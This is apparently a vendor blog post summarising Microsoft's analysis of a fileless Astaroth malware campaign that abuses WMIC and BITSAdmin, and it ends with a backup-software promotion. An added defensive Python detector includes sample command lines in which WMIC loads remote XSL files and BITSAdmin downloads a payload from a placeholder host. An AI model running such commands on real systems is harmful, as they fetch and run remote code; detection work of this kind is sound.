
Summary

According to Microsoft, its Defender ATP Research team has discovered a fileless malware campaign that spreads the Astaroth backdoor to a large number of victims using living-off-the-land techniques. Let’s look at the details of this attack.

Microsoft Warns About Fileless Malware Campaign

According to a blog post from Microsoft, the security team noticed something abnormal during a standard review of telemetry: a detection algorithm designed to catch a specific fileless technique showed a sharp increase in the use of the Windows Management Instrumentation Command-line (WMIC) tool.

[Figure: sharp increase in the use of the WMIC tool]

When Microsoft noticed the recent campaigns, it analyzed these events in detail. The attacks start with a spear-phishing email that contains a link to a malicious .LNK shortcut file.

How Fileless Astaroth Malware Campaign Works

If a user carelessly opens this file, it runs a BAT command line that launches WMIC. WMIC downloads an XSL file hosting obfuscated JavaScript, which runs WMIC again. It then downloads another XSL file that uses BITSAdmin to download additional payloads.

As the following figure shows, a number of tools are downloaded one after another. These programs also download additional code and pass their output to one another, executing only in memory without writing anything to the hard drive.

[Figure: how the Astaroth malware campaign works]

Since no file is written to disk, it is difficult for traditional antivirus software to detect the malicious code. In the end, Astaroth is loaded onto the system. The Trojan can dump credentials for various categories of applications and upload the stolen information to a remote server.

Astaroth was first spotted in 2018 and seen again in February this year in campaigns that targeted Brazilian and European users. More recently, it was detected in May and June this year by the Microsoft Defender ATP Research Team.

According to experts, at no point during the attack chain is any file run that is not a system tool. This technique, called living off the land, uses legitimate tools already present on the target system to disguise malicious actions as regular activity. It has become popular with malware authors over the last three years and is now used widely.

Attackers could use the stolen data to move laterally across networks, sell the information in the cybercriminal underground, carry out financial theft, and more.

How to Protect PC Against Fileless Malware Campaign

The malicious activities are reported in Microsoft Defender Security Center as alerts. Organizations can then use features in Microsoft Defender ATP, including endpoint detection and response (EDR), advanced hunting and other functions, to investigate and respond to the attack.

It is worth noting that Microsoft Defender ATP EDR provides durable, robust detections for the fileless technique across the entire attack chain.
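The chain described above (LNK → BAT → WMIC → WMIC → BITSAdmin, every stage a built-in system tool) is exactly what process-lineage detection is built to catch. The following is an added example, not code from Microsoft or from this article: it runs a simple living-off-the-land rule set over constructed, Sysmon-style process-creation events and flags a chain once two or more linked ancestors match. The event fields, rules and placeholder URLs are all assumptions for illustration.

```python
import re

# Constructed sample events (pid, parent pid, image, command line) modelling the
# article's chain: explorer -> cmd (from the .LNK) -> wmic -> wmic -> bitsadmin.
# The URLs are placeholders; the last two rows are benign admin use of the same tools.
SAMPLE_EVENTS = [
    {"pid": 10, "ppid": 1, "image": "explorer.exe", "cmd": "explorer.exe"},
    {"pid": 20, "ppid": 10, "image": "cmd.exe", "cmd": "cmd.exe /c start invoice.lnk"},
    {"pid": 30, "ppid": 20, "image": "wmic.exe",
     "cmd": 'wmic.exe os get /format:"http://stage.example.invalid/a.xsl"'},
    {"pid": 40, "ppid": 30, "image": "wmic.exe",
     "cmd": 'wmic.exe os get /format:"http://stage.example.invalid/b.xsl"'},
    {"pid": 50, "ppid": 40, "image": "bitsadmin.exe",
     "cmd": "bitsadmin.exe /transfer job /download http://stage.example.invalid/p.bin C:\\Temp\\p.bin"},
    {"pid": 60, "ppid": 10, "image": "wmic.exe", "cmd": "wmic.exe os get caption"},
    {"pid": 70, "ppid": 10, "image": "bitsadmin.exe", "cmd": "bitsadmin.exe /list"},
]

# Per-tool rules: WMIC pulling a stylesheet (XSL can carry script) from a URL,
# and BITSAdmin transferring a file from a remote host.
LOLBIN_RULES = {
    "wmic.exe": re.compile(r"/format:\s*\"?https?://", re.IGNORECASE),
    "bitsadmin.exe": re.compile(r"/transfer\b.*https?://", re.IGNORECASE),
}

def suspicious(event):
    """True when the event's image has a rule and its command line matches it."""
    rule = LOLBIN_RULES.get(event["image"].lower())
    return bool(rule and rule.search(event["cmd"]))

def lineage(by_pid, pid):
    """Return the event and all of its ancestors, child first."""
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain

def detect_chain(events):
    """One alert per suspicious event; fileless_chain is set when two or more
    events in its ancestry (itself included) are suspicious, i.e. tools chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if not suspicious(e):
            continue
        chain = lineage(by_pid, e["pid"])
        hits = sum(1 for x in chain if suspicious(x))
        alerts.append({"pid": e["pid"], "chain": [x["image"] for x in chain],
                       "lolbin_hits": hits, "fileless_chain": hits >= 2})
    return alerts

if __name__ == "__main__":
    for alert in detect_chain(SAMPLE_EVENTS):
        print(alert)
```

The benign `wmic os get caption` and `bitsadmin /list` rows produce no alert, while the second WMIC stage and the BITSAdmin stage are flagged as a chain because their ancestors already matched.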

Thus, to protect PCs against the fileless Astaroth malware, ensure Windows Defender is running and has the latest updates. Of course, keeping Windows itself up to date is also necessary.

Additionally, for this fileless malware campaign, Office 365 ATP (Advanced Threat Protection) can detect the emails that include the malicious links that start the infection chain.

Tip: Sometimes a malware campaign can lead to data loss. To protect important files, it is better to back them up. Here, our professional file backup software, MiniTool ShadowMaker, will be a good assistant.